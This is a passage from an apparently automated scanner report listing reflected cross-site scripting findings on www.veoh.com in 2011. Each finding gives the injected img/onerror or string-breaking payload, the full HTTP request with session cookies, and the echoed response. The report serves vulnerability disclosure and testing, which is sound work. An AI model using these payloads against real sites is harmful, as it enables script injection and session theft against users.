<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_celebrity_and_showbizfb1e3<img src=a onerror=alert(1)>01b1c12b160"}</textarea>
...[SNIP]...

3.448. http://www.veoh.com/browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e231'%3bf41ab2e3621 was submitted in the REST URL parameter 6. This input was echoed as 3e231';f41ab2e3621 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T3e231'%3bf41ab2e3621 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:59 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=98
Content-Length: 99706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'0c90fe9c71e40fe15f4f32a57a50efef',
'v20767641DYmkkC9T3e231';f41ab2e3621'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

3.449. http://www.veoh.com/browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1b1b0<img%20src%3da%20onerror%3dalert(1)>1aed6fadab1 was submitted in the REST URL parameter 4. This input was echoed as 1b1b0<img src=a onerror=alert(1)>1aed6fadab1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/educational_and_howto1b1b0<img%20src%3da%20onerror%3dalert(1)>1aed6fadab1/watch/v20767155HXCcYkcJ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:45 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=90
Content-Length: 78324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_educational_and_howto1b1b0<img src=a onerror=alert(1)>1aed6fadab1"}</textarea>
...[SNIP]...

3.450. http://www.veoh.com/browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa06e"><img%20src%3da%20onerror%3dalert(1)>7b8d668185d was submitted in the REST URL parameter 4. This input was echoed as aa06e"><img src=a onerror=alert(1)>7b8d668185d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/educational_and_howtoaa06e"><img%20src%3da%20onerror%3dalert(1)>7b8d668185d/watch/v20767155HXCcYkcJ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:59 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=96
Content-Length: 78368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/educational_and_howtoaa06e"><img src=a onerror=alert(1)>7b8d668185d/sort/most viewed" selected="selected">
...[SNIP]...

3.451. http://www.veoh.com/browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1c2d'%3b713d1af7ffd was submitted in the REST URL parameter 6. This input was echoed as b1c2d';713d1af7ffd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJb1c2d'%3b713d1af7ffd HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:55 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=80
Content-Length: 99708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'9445fc2cfdb27ccafffb6e6be9397f4d',
'v20767155HXCcYkcJb1c2d';713d1af7ffd'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

3.452. http://www.veoh.com/browse/videos/category/entertainment/watch/v20767324YkGXZzfQ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/entertainment/watch/v20767324YkGXZzfQ

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4e10"><img%20src%3da%20onerror%3dalert(1)>e01df9f8906 was submitted in the REST URL parameter 4. This input was echoed as b4e10"><img src=a onerror=alert(1)>e01df9f8906 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/entertainmentb4e10"><img%20src%3da%20onerror%3dalert(1)>e01df9f8906/watch/v20767324YkGXZzfQ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:35 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=75
Content-Length: 76209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/entertainmentb4e10"><img src=a onerror=alert(1)>e01df9f8906/sort/most viewed" selected="selected">
...[SNIP]...

3.453. http://www.veoh.com/browse/videos/category/entertainment/watch/v20767324YkGXZzfQ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/entertainment/watch/v20767324YkGXZzfQ

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b3fcf<img%20src%3da%20onerror%3dalert(1)>5a765c7587a was submitted in the REST URL parameter 4. This input was echoed as b3fcf<img src=a onerror=alert(1)>5a765c7587a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/entertainmentb3fcf<img%20src%3da%20onerror%3dalert(1)>5a765c7587a/watch/v20767324YkGXZzfQ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:50 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=100
Content-Length: 76165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_entertainmentb3fcf<img src=a onerror=alert(1)>5a765c7587a"}</textarea>
...[SNIP]...

3.454. http://www.veoh.com/browse/videos/category/entertainment/watch/v20767324YkGXZzfQ [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/entertainment/watch/v20767324YkGXZzfQ

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48a9e'%3b18c90b1747d was submitted in the REST URL parameter 6. This input was echoed as 48a9e';18c90b1747d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/entertainment/watch/v20767324YkGXZzfQ48a9e'%3b18c90b1747d HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:39:01 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=50
Content-Length: 95042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'c8bbb1855300e40d30ea4034b2810d38',
'v20767324YkGXZzfQ48a9e';18c90b1747d'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

3.455. http://www.veoh.com/browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9b8b"><img%20src%3da%20onerror%3dalert(1)>fa9b9160bac was submitted in the REST URL parameter 4. This input was echoed as b9b8b"><img src=a onerror=alert(1)>fa9b9160bac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/people_and_blogsb9b8b"><img%20src%3da%20onerror%3dalert(1)>fa9b9160bac/watch/v20767178Fn5bZQJP HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:28 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=60
Content-Length: 77558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/people_and_blogsb9b8b"><img src=a onerror=alert(1)>fa9b9160bac/sort/most viewed" selected="selected">
...[SNIP]...

3.456. http://www.veoh.com/browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 36ade<img%20src%3da%20onerror%3dalert(1)>19ea89e01e1 was submitted in the REST URL parameter 4. This input was echoed as 36ade<img src=a onerror=alert(1)>19ea89e01e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/people_and_blogs36ade<img%20src%3da%20onerror%3dalert(1)>19ea89e01e1/watch/v20767178Fn5bZQJP HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:50 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=90
Content-Length: 77514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_people_and_blogs36ade<img src=a onerror=alert(1)>19ea89e01e1"}</textarea>
...[SNIP]...

3.457. http://www.veoh.com/browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 614f9'%3be5e8b5ac5dc was submitted in the REST URL parameter 6. This input was echoed as 614f9';e5e8b5ac5dc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP614f9'%3be5e8b5ac5dc HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:39:01 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=58
Content-Length: 106431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'2890af68ed5816417589a98da58f349b',
'v20767178Fn5bZQJP614f9';e5e8b5ac5dc'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

3.458. http://www.veoh.com/category/list/tab/groups [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /category/list/tab/groups

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba32a"><img%20src%3da%20onerror%3dalert(1)>a3be2b20567 was submitted in the REST URL parameter 4. This input was echoed as ba32a"><img src=a onerror=alert(1)>a3be2b20567 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /category/list/tab/groupsba32a"><img%20src%3da%20onerror%3dalert(1)>a3be2b20567 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
